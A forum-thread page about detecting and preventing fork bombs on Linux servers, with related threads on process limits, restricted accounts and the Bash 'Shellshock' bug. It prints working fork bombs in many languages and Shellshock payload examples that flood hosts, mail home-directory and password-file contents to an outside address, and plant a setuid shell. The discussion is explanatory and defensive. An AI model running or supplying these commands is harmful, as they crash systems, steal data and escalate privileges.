Fork-bomb detection

I run a server that I use when I give a "intro to bash" workshop at my school
I allow a guest user to login; but a "smart" user, or one aware of fork-bombing could easily detonate one on my server. I have the limits for the guest user pretty tight, so they really cant any damage.
I was just wondering if there was a way to actually detect a fork-bomb detonation?

ivoarch wrote:
Try limit the number of processes.
http://linuxmafia.com/faq/VALinux-kb/pr … -user.html
https://wiki.archlinux.org/index.php/Re … management
$> cat /etc/security/limits.conf
* hard nproc 1000
Yeah I know how to protect against it, but it would be nice if i could somehow detect when its going on.
If there was some kind of tool that could moniter the rate of new proc's by a user, and if its above a certain threshold, then we know its some kind of bad program or a bomb
Google is no help tho

Similar Messages

  • Would Arch survive a "fork bomb?"

    I was reading this on SecurityFocus.com and they mention that RedHat, Gentoo, and Mandrake all crashed.
    http://www.securityfocus.com/columnists … f=rssdebia
    I then proceeded to fork bomb every Unix machine I could get my hands on. My FreeBSD server at home shrugged it off (even after inviting other connected users to try), as did my OpenBSD gateway. This, too, is exactly what I expected to happen.
    Next, I asked several my associates who use Linux to try it out on their machines, and we didn't have to go far to find more Linux distributions that succumbed to the same painfully effective fork bomb attack. Both Gentoo and Red Hat followed in the footsteps of Mandrake, and each died quicker than you can say "unreasonable default settings." I'll quickly mention here that Debian did not suffer the same fate as the others; congrats to the Debian development team.
    For those who are not aware, let me briefly explain the cause of fork bombing. First, the shell must be configured to operate with what I consider to be unreasonable limits. This itself has nothing to do with the kernel. Second, the kernel must allow many more processes to be created than should be. Since shells often default to the maximum number of processes supported by the kernel, together we have a problem.

    This topic has been discussed here.
    The gist of it is Arch would not survive a fork bomb and we need to look into ways to secure Arch form this type of attack.

  • Xcode: fun with fork-bombs

    This isn't a question; just an FYI so that when people search for 'zombie python' in the forums they'll find something.
    I came back from a week-long trip and found hundreds of python zombie processes on my system, for all users [even root].
    Was a bit worried that my machine had been compromised until I saw this:
    http://elliotth.blogspot.com/2006/06/attack-of-mac-python-zombies.html
    It turns out the latest XCode has a bug which creates many zombie python processes. If you do not reboot frequently, your machine will run out of processes.
    This is caused by the distributed build component; when installed, XCode launches a daemon to volunteer your machines for distributed builds, regardless of whether you even enable distributed builds [bad Apple! I'm glad I've got a good firewall].
    The fix is simple enough:
    cd /System/Library/LaunchDaemons
    sudo launchctl unload -w com.apple.dnbobserver.plist
    A more in-depth discussion is here:
    http://groups.google.de/group/comp.sys.mac.system/browse_thread/thread/dfc0557a3 bdf862c/e8368455c0510120?hl=de

    It would be better if you mention exactly which version of Xcode you've got installed. Do you mean 2.4? That's the latest version.

  • Fork Bomb..cant login to gnome-shell

    ok long story short..a friend of mine sent me a useful shell script that did everything i needed it to do properly but with the line ){ :& };: appended to it. (This was an april fools apparently). Turn Computer off and expect it to be the end of that. Get to GDM and I cannot login, well it authenticates as in it doesnt say wrong password but it just goes straight back to gdm.
    I can log in to another terminal
    Really havent got a clue what is going on, would really appreciate help as i will have to install fedora 16 in a minute as i havent got time to play about as i have university deadlines to met.

    I've had this problem before, when running Ubuntu. See here.

  • Restrict user account, prevent intruder from doing bad things

    Hello,
    I am currently planning and setting up a backup-server with ZFS. There will be daily snapshots of the filesystem (cron job).
    Different machines connect automatically without a password via ssh (public/private key) and rsync their stuff to the backup server.
    Each machine will connect to it's specific user (and therefore to it's own home directory) on the backup server. I thought that if one of the machines gets compromised (e.g. someone gets access to the private key) he only could access one home folder, nothing more. As there are daily snapshots, even it he deletes all files, they will still be there.
    Is just adding a normal user per machine enough or should / can be done more to enhance security? As I said the user account is only for logging in and rsyncing stuff to the home directory.
    E.g. disabling executing of applications except of rsync? Preventing fork bombs? Making it harder to run exploits? Other stuff I didn't think about?
    Thanks
    Last edited by cyberius (2013-02-17 08:23:39)

    -Syu wrote:
    You might also want to limit those user accounts themselves. If you only use them vor rsyncing, remove them from all unnecessary user groups (the "users" group in particular) and take away their shells.
    On top of that, you may want to give each user a chroot jail, so they can't even write to /tmp for example.
    I'm not too familliar with rsync yet. If you really need to make your other machines log in and execute rsync themselves over SSH, you might want to take a look at limited shells like lshell to only allow execution of that program.
    Great, thank you! This was something I was looking for!
    But if I take away the shell completely (e.g. chsh -s /sbin/nologin username), I think I won't be able to rsync via ssh right?
    lshell sounds very promissing for my case, I will have a look at it!
    edit: I found out that there is also a "--restricted" option for "bash", where one can disable PATH variables, changing directories. I will have a look.
    Last edited by cyberius (2013-02-18 10:14:36)

  • Large number of lwp_suspend calls.

    Hi,
    i have a sample test program which moves files between directories. The code is pasted below.
    The mv is taking more time on one of the servers compared to others.
    A truss reveals an unusally high number of lwp_supend sys calls on the problematic server.
    What could be the reason for this? How can we trouble shoot this.
    public class Test {
          * @param args
         public static void main(String[] args) {
              if (args.length != 2) {
                   System.out.println("Usage::  InputDir OutputDir ");
                   return;
              String commandEx, commandSym;
              String inDir = args[0];
              File inDirFile = new File(inDir);
              String outDir = args[1];
              while (true) {
                   File[] files = inDirFile.listFiles();
                   if (files.length != 0) {
                        System.out.println("No of files = " + files.length);
                        Date startTime = Calendar.getInstance().getTime();
                        System.out.println("Time Before moving files is :" + startTime);
                        for (int j = 0; j < files.length; j++) {
                             commandEx = "/bin/mv " + files[j] + " " + outDir;
                             Runtime rt = Runtime.getRuntime();
                             Process result = null;
                             try {
                                  result = rt.exec(commandEx);
                                  result.waitFor();
                             } catch (Exception e) {
                                  System.out
                                            .println("Encountered exception while trying to copy files");
                             if (0 != result.exitValue()) {
                                  System.out.println("Failed to copy file");
                        Date endTime = Calendar.getInstance().getTime();
                        System.out.println("Time after moving all the files:"
                                  + Calendar.getInstance().getTime());
                        long diff = endTime.getTime() - startTime.getTime();
                        System.out.println("Time to move: " + diff / 1000 + " secs");
                   } else {
                        System.out.println("No files in the input directory");
                        return;
                   return;
    }

    Quite frankly, I'm surprised this code isn't causing a noticeable headache on all your machines, if any of them. It's hard to imagine they are all the same kind of system, with comparable loads, but only one is struggling with this task.
    How many CPUs on the system? If your load averages, as shown in the prstat output you gave, exceed the number of CPUs, the box in question is probably saturated.
    I'd first be curious how many LWPs are attributable to the Java process itself. I'm finding it hard to take my eyes off this section:
                        for (int j = 0; j < files.length; j++) {
                             commandEx = "/bin/mv " + files[j] + " " + outDir;
                             Runtime rt = Runtime.getRuntime();
                             Process result = null;
    The code draws one Runtime object for every mv(1). That can scale to fork-bomb status depending on the number of files you're moving. And since each separate process runs in its own subshell, it's going to fight all other concurrent processes for access to the target directory's lock, in order to place and record its file entry safely. The many lwp_suspend calls may be attributable to all but one of those processes being told to wait until the directory lock is freed by the current owner.
    It would be good for all systems to economize on the action here. Why this approach would afflict one system but not others that are effectively the same is a puzzler.
    I'd suggest looking at prstat -L, but with 16k+ LWPs it's going to output a small phonebook of entries.

  • Maxuprc

    My server has a maxuprc of 29 k
    it hit an issue with memory.
    I was told by a system admin that if I reduce the maxuprc maximum processes per user the server will be more stable.
    Could you tell the advantages if any for reducing the maxuprc limit to 5k.
    Thanks,
    Shyam

    shyam252 wrote:
    My server has a maxuprc of 29 k
    it hit an issue with memory.
    I was told by a system admin that if I reduce the maxuprc maximum processes per user the server will be more stable.
    Could you tell the advantages if any for reducing the maxuprc limit to 5k.
    Thanks,
    ShyamHi Shyam,
    I set my login servers maxuprc to 1024 and that has been fine for the last 10 years.
    We had a problem with runaway jobs a bit like a fork bomb and setting maxuprc to 1024 stop the system from locking up for other users and allows me to kill the rogue users jobs :-)
    Cheers
    Richard

  • LXDE: complete clean-up

    Hi,
    I've got a weird problem: LXDE unworkable on login. The desktop is there, but it flutters like there's is a fork bomb in a GUI element. I tried to delete everything in /etc/xdg/ and ~/.config and reinstall; first login is good, then the flutter returns. As the wallpaper survived my cleanup, I think there's some configuration left. Is there a way to make a really clean reinstall?

    falconindy wrote:Make a new user.
    It's worth a try reproducing. You can then step-by-step copy (or symlink) local user dirs (like .cache etc) into the new user's home dir until the problem re-occurs. If it doesn't, your problem lies somewhere else.
    A big advantage of reproducing it this way, is that you can make a sound bug report to the programmers. That's open source contribution too, you know

  • Why can Finder not open?

    Message: Application Finder can't be opened. What causes this?

    Try a Restart. 
    If this happens often, and you get "error 10810" message, it may be a problem with the "process table" being full.  See http://www.thexlab.com/faqs/error-10810.html for a detailed explanation.
    As it notes, one possible cause is a "fork bomb" (I love that term ), probably in a 3rd-party app.

  • Are there any updates to OSX for the "Bash" virus?

    When will there be a update to combat the "Bash" virus?

    You are actually completely wrong, a malicous website could do anything from sending a fork bomb to your computer to opening a shell and controlling your computer completely: examples from stackexchange::: 
    With access to bash, even from the POV of a web user, the options are endless. For example, here's a fork bomb:
    () { :; }; :(){ :|: & };:
    Just put that in a user agent string on a browser, go to your web page, and instant DoS on your web server.
    Or, somebody could use your server as an attack bot:
    () { :; }; ping -s 1000000 <victim IP>
    Put that on several other servers and you're talking about real bandwidth.
    Other attack vectors:
    # theft of data () { :; }; mail -s "Your files" [email protected] | find ~ -print () { :; }; mail -s "This password file" [email protected] | cat ~/.secret/passwd # setuid shell () { :; }; cp /bin/bash /tmp/bash && chmod 4755 /tmp/bash
    There's endless other possibilities: reverse shells, running servers on ports, auto-downloading some rootkit to go from web user to root user. It's a shell! It can do anything. As far as security disasters go, this is even worse than Heartbleed.

  • Parallel processing on multiple IdM instances -- real enterprise class

    Hi all. We run what we earnestly hoped would be a true enterprise class IdM v6 SP1 installation: 2x v440 Sol9 app servers each with 2 IdM instances (AS virtual servers), each host dual CPU and 4GB RAM available; connected to a 4 node dual CPU Oracle RAC cluster.
    But our performance, to use a technical term, sucks bollocks, and has done for >12 months. The main area where this hurts is when we run a DBTable ActiveSync process to update the user base and any associated resources.
    We suspect a few things, but ultimately the most frustrating and intractable problem is this: IdM processes all the Update User tasks stemming from the ActiveSync poll one by one, sequentially, in series, and all on the originating IdM instance. So if we have, say, 5000 updates to process, we watch 5000 sequential User Update tasks, one after the other. Even if each task takes only a couple seconds, we often notice inexplicable gaps of many seconds between one sequential task completing (start time + execution time) and the next beginning. The end result is a throughput rate of usually less than 300/hr -- more than 10hrs to process those 5000 updates!
    Despite setting the [custom] Update User wf to execMode='async', IdM seems to refuse to run these tasks in parallel. In an installation of this size and resource capacity, this is excruciating. Plus there's the fact that as I write, and as it crawls along, the IdM instance running the tasks is showing up in prstat like this:
    PID USERNAME SIZE RSS STATE PRI NICE TIME CPU PROCESS/NLWP
    28946 sentinel 2583M 2379M cpu3 28 0 87:27:53 25% appservd/177
    That's quite a lot of resource-use for not a lot of outcome...
    So, does anyone know: how can we get these tasks to run multiple in parallel rather than sequentially; how can we get the task load to be spread across all 4 available IdM instances rather than just the one that executed the ActiveSync poll?
    In long suffering desperation, any help greatly appreciated!
    PS - 2 things regarding parallel:
    1. on the TaskDefinition for the Update User wf, there is also an attribute named 'syncControlAllowed' -- anyone know what this means/does? Would setting it to 'false' perhaps give us true async/parallel mode?
    2. I suspect forcing the task into background could potentially give parallel behaviour, but the problem is that Update User is of course called by any user update task, and when done interactively the administrator may not wish to have the task run in the background.

    Hi,
    i'm afraid i don't know an easy answer to your question. But there are several things that should be considered:
    1) 12s average update time seems a lot. I'm sure that can be optimized. Have you thought about a dedicated sync form (assigned to the proxy admin used for active sync)? If you have that you might also consider setting viewOptions.Process there to use a simplified workflow optimized for your sync process. Take a look at the dynamic tabbed user form example as well - some of the resources you have may not be subject to synchronization and those should be ruled out by setting the sync forms "TargetResources" property to an aproptiet value.
    2) i recently found an interessting way of parallelizing tasks. This is potentially dangerous as you have to build something in that prevents this from being a "fork bomb". Still some example code for a simple scenario where you just want to sync global.email, populated by your AS form. If the workflow consisted out of "start", "nonblocking task launch" and "end" the "nonblocking task launch" had an action like
    <Action id='0'>
        <expression>
          <block>
            <defvar name='session'>
              <invoke name='getLighthouseContext'>
                <ref>WF_CONTEXT</ref>
              </invoke>
            </defvar>
            <defvar name='tt'>
              <new class='com.waveset.object.TaskTemplate'>
                <invoke name='getObject'>
                  <ref>session</ref>
                  <s>TaskDefinition</s>
                  <s>Nonblocking Workflow</s>
                  <map/>
                </invoke>
              </new>
            </defvar>
            <invoke name='setSubject'>
              <ref>tt</ref>
              <invoke name='getSubject'>
                <ref>session</ref>
              </invoke>
            </invoke>
            <invoke name='setVariable'>
              <ref>tt</ref>
              <s>accountId</s>
              <ref>user.waveset.accountId</ref>
            </invoke>
            <invoke name='setVariable'>
              <ref>tt</ref>
              <s>email</s>
              <ref>user.global.email</ref>
            </invoke>
            <invoke name='runTask'>
              <ref>session</ref>
              <ref>tt</ref>
            </invoke>
          </block>
        </expression>
      </Action>The workflow "Nonblocking Workflow" then would have accountId and email available in its variables and if it is defined as "async" it will really be launched that way - build in something that prevents your system from exploding...
    3) probably safer than trying what i implied in 2) (i only used this for a totally different task that can not explode) you could consider to have several instance of the database table resource adapter. Lets say your primary key in the db is "employeeId". If you define for seperate resources, each handling employeeIds modulo [1,2,3,4] only you could distribute the load among your cluster. I did a similar thing with flatfileactivesync before.
    4) back to the average 12s again. If you don't have some slow resources this could mean that the parallel resource limit kicks in. Take a look at waveset.properties about limits like this.
    Synchronization is not the ootb strength of IDM - but with some optimization you should be able to get to reasonable results.
    Regards,
    Patrick

  • Memory Randomization - Linux default configuration

    Hi,
    lately I've been wondering if the Linux kernel has any ASLR (Address Space Layout Randomization) enabled by default. I know that PaX and grsecurity are in vanilla, but I've also read that by enabling these you will run into problems with X, MPlayer etc. Considering that exploits are made much, much harder when the bad guy doesn't know where his code is located in the heap, I presume that it would be worthwhile to use this technology as many of the modern exploits especially target applications the user uses to interact with the internet.
    On a similar note, is the NX bit being used by default?
    So, what's the current status and what does the near future look like?
    Edit: Of course I meant the heap, not stack. Fixed, thanks dyscoria.
    Last edited by tkdfighter (2009-03-27 14:06:36)

    ]So I did some reading on Wikipedia. grsecurity actually bundles PaX. Also, since version 2.6.12, the kernel has a weak form of ASLR enabled by default, as does OS X. Windows Vista has a more complete implementation. Reading this, it appears that the weak OS X implementation is not really sufficient. Miller doesn't really make a statement about Linux, but I assume you could argue that the same goes for Linux.
    I can see though that PaX is not in vanilla, contrary to what I first thought, and that it doesn't support the most recent kernels.
    Another question: why isn't there any protection for simple fork bombs in Arch by default? There is no distribution I know of that has nproc set in limits.conf by default. Some basic things like this would be kind of nice, as I'm sure that there are alot of trivial settings to improve security I and other users don't know about.

  • /usr/bin binaries automatically executed?

    "Houston, we have a problem"
    I've put in /usr/bin/ a simple script  /usr/bin/pumount (I moved the original pumount in pumount_normal)
    the pumount content is this:
    #!/bin/bash
    pumount_original $1
    notify-send -i drive-removable-media 'USB storage device removed: ' $1
    echo media_removed > /dev/vc/1
    the problem is that it is AUTOMATICALLY launched at every startup, so (I suppose) every /usr/bin/ is launched on startup...
    (I have my noteo notify the launch of the notify-send and "media_removed" appear on my vc1)
    and this appen too for some other "folder" for scripts... (I tried /usr/sbin too)
    now, maybe this is totally normal and I'm simply stupid (:P) but /usr/bin contains 1140 files on my system....
    I'm not sure why this happen, and I reinstalled arch one month ago, so I don't think I already broke it << (I hope at least..)
    Tell me if you too experiment this issue, and if it's an issue..
    Thanks for the attention..
    bye

    sniffles wrote:
    _Marco_ wrote:@sniffles
    why should my system call a "pumount " without args in the boot?
    I think obviously there is a problem, the point is "it's only for me or for every archer?"
    I have no idea why, I don't have that particular thing on my system. Now that iphitus gave you a reason, my scenario does not seem so laughable, does it? A lot more credible than "omg my system runs everything in /usr/bin/ on every boot!" (do you even realise what that would do?)
    well, did you have an idea before iphitus pointed out this?
    I just had mine script executed on every boot and I didn't found any reason for this...
    I realise what that would do, but if I don't understand something I study it (tried to get it work for two hours) and, if I still don't understand, I ask to someone more expert.
    excuse me if I choose this forum.. didn't know it was a philosophy forum, I thought it was ArchLinux forum.
    edit:
    for the fork bomb it was more a "demonstrative" thing that anything else... (the "aim" were more important of the "result")
    if I had the will to crash his computer I would have tested it on my box first... don't you think?
    anyway this is not the point.
    next time I ask something stupid, please,  simply start reading another topic.
    Nobody need that kind of help.
    Last edited by _Marco_ (2008-06-09 10:16:26)

  • Why does this make *nix crash ?

    why does
    :(){ :|:& };:
    make my system crash ?
    * Don`t try it if you don`t want to crash your box

    :(){:|:&};:
    can also be viewed as
    function(){
    function|function&
    Does this look more familiar? It's basically a standard bash function. The code you posted, called a forkbomb, creates a bash function called ":" which calls itself recursively twice through a pipe and sends the recursion call to the background. Basically, this causes the process to fork (or split) itself forever. This creates a huge number of processes which overrun your CPU, causing your precious computer to freeze/crash/whatever.
    Sending the second function call to the background causes the calling function to not wait until the call returns. Since there is no stop condition for this recursion, the function would wait forever allowing you to kill it and all its children with ^C. Since the recursion call is running in the background, the calling function will complete immediately making it damn near impossible to kill its child processes.
    So why call it twice? Because of the recursive call in the background, the calling process dies as soon as it makes the recursive call. Hence, if we only call it once it will always have one process replacing its parent, defeating the purpose of a forkbomb.
    What's the point? It's a denial of service attack, plain and simple.
    Various other type of forkbombs...
    Windows
    %0|%0
    -or-
    :s
    start %0
    %0|%0
    goto :s
    Perl
    fork while fork
    Haskell
    import Control.Monad
    import System.Posix.Process
    forkBomb = forever $ forkProcess forkBomb
    Python
    import os
    while True:
    os.fork()
    Ruby
    loop { fork }
    C/C++
    #include <unistd.h>
    int main(void)
    while(1)
    fork();
    return 0;
    NASM
    section .text
    global _start ;Call start
    _start:
    push byte 2 ;syscall to Linux fork
    pop eax ;set EAX argument for fork to NULL [So it works in strings]
    int 0x80 ;Execute syscall with fork & the EAX [null, above] argument
    jmp short _start ;Go back to beginning, causing a fork bomb
    Lisp
    (defmacro wabbit () ;; A program that writes code.
    (let ((fname (gentemp 'INET)))
    `(progn
    (defun ,fname () ;; Generate.
    nil)
    (wabbit))))
    (wabbit) ;; Start multiplying.
    * Disclaimer: It's not my fault if you fuck up your system trying these out.
    ** Edit: Wow... in the time it took me to write that up a crapload of people answered the question... oh well.
    Last edited by Ghost1227 (2009-06-21 14:02:55)

  • Incorrect resolutions for 16:10 external displays, unable to detect 16:9

    Hey there all, this is my first post here. It looks like some people have had similar issues—particularly with an incomplete/incorrect list of resolutions being provided for external displays.
    I am shopping around for an external display for my MacBook (my specs are included) and I tested a few different ones today, but encountered problems.
    - On a 22" ASUS monitor (sorry I don't have the model) using Mini-DVI to VGA, the native resolution (I assume 1680x1050) is not available, and most resolutions offered are 4:3 ratio (1600x1200 worked). The highest widescreen resolution listed was 1280x768.
    - Next I tried a 19" ASUS, this time 16:9, but the monitor would not display at all. The MacBook display would go blue as normal but then flicker, as if it could not detect the display. This also happened with a 24" BENQ monitor (also 16:9).
    Wondering whether or not this was a problem with using VGA, I then bought a Mini-DVI to DVI adapter and tried again on the 19" and 24" (the 22" ASUS did not have a DVI-in) but the same flickering blue screen appeared, with nothing displayed on the monitor.
    These were my thoughts:
    1. My firmware is not up-to-date. I check in System Profiler and am running Boot ROM Version MB41.00C1.B00 and SMC Version (system): 1.31f0. These are definitely up-to-date for my model MacBook.
    2. Drivers are out of date. This does not seem likely as I am running OS X 10.5.7.
    Other than that, I am at a loss! I haven't yet forked out the $49 to do phone support with Apple, that will be my next bet.
    Has anyone had this problem, or have any ideas what I can try? Short of buying a new Unibody MacBook of course .
    Thanks guys, hope you can help. Just let me know if you need more info about my computer.

    It's unusual to strike out like that with three different monitors using two different adapters. On the other hand, with all the video issues that have been reported by others on these forums since the 10.5.7 update, it's not too surprising.
    Is a 10.5.6 downgrade a possibility for you? For example, do you use Time Machine and can you in that case revert to a previous time when the MB was running 10.5.6? Perhaps that's not a great suggestion, but it would be something to try.
    There is some remote chance, though somewhat unlikely given that three different monitors are involved, that the embedded display driver data (EDID) in each monitor is bad or incomplete. If you care to investigate that possibility, there is a program called SwitchRes X that allows you to snoop a monitor's EDID and turns it into a human readable text file.
    One final suggestion would be to try yet one more monitor to see if any monitor can return a good result. One obvious choice would be an Apple monitor. If there is trouble when trying to connect to an Apple monitor, then that would certainly point to some problem in the MB's configuration or hardware. And not to cast aspersions on the brands you have already tried, but try another brand (if not Apple) that is perhaps more mainstream and known to be more Mac compatible and less firmly in the PC camp where plug-and-display drivers have never mattered very much and are very often botched by the monitor makers. Dell, Samsung and LG are three big brands that come to mind. Good luck.

Maybe you are looking for

  • Can't seem to install Adobe Flash Player 9 or earlier

    I'm trying to watch a video on Yahoo and I've installed Flash Player, like, 4 times. Even restarted a few times. What's up??? I'm truly frustrated. Thanks.

  • Timestamp Format

    Hi Gurus, I have a double field which stores date values and i have another double fiels which stores time.Now i need to concat both these and cast it to timestamp.The problem which i am facing is with the Format of timestamp.I am unable to specify t

  • Problem Updating iPod Classic

    okay, i have had an ipod classic for a while now (not quite sure how long), but my dad bought one a few days ago, his has a firmware version 2.0.5 i think and mine is 1.3 but every time i click update it says it is up to date. Is there any way i can

  • Europe unlimited sub

    Hi I bought the europe unlimited subscription I live in uk and I noticed that UK was included in the offer so I bought it but when I try to call uk landline it tells me that I cannot call a number from which country I currently reside in but there wa

  • New PC -issues  to reinstall Creative Suites 5

    I have a new PC with Windows 8 and Internet Explorer 10. I am trying to retinstall my Creative Suites 5 Extended Student and Teacher edition. For some reason the error message states my browser is not supported or current. I have my order number and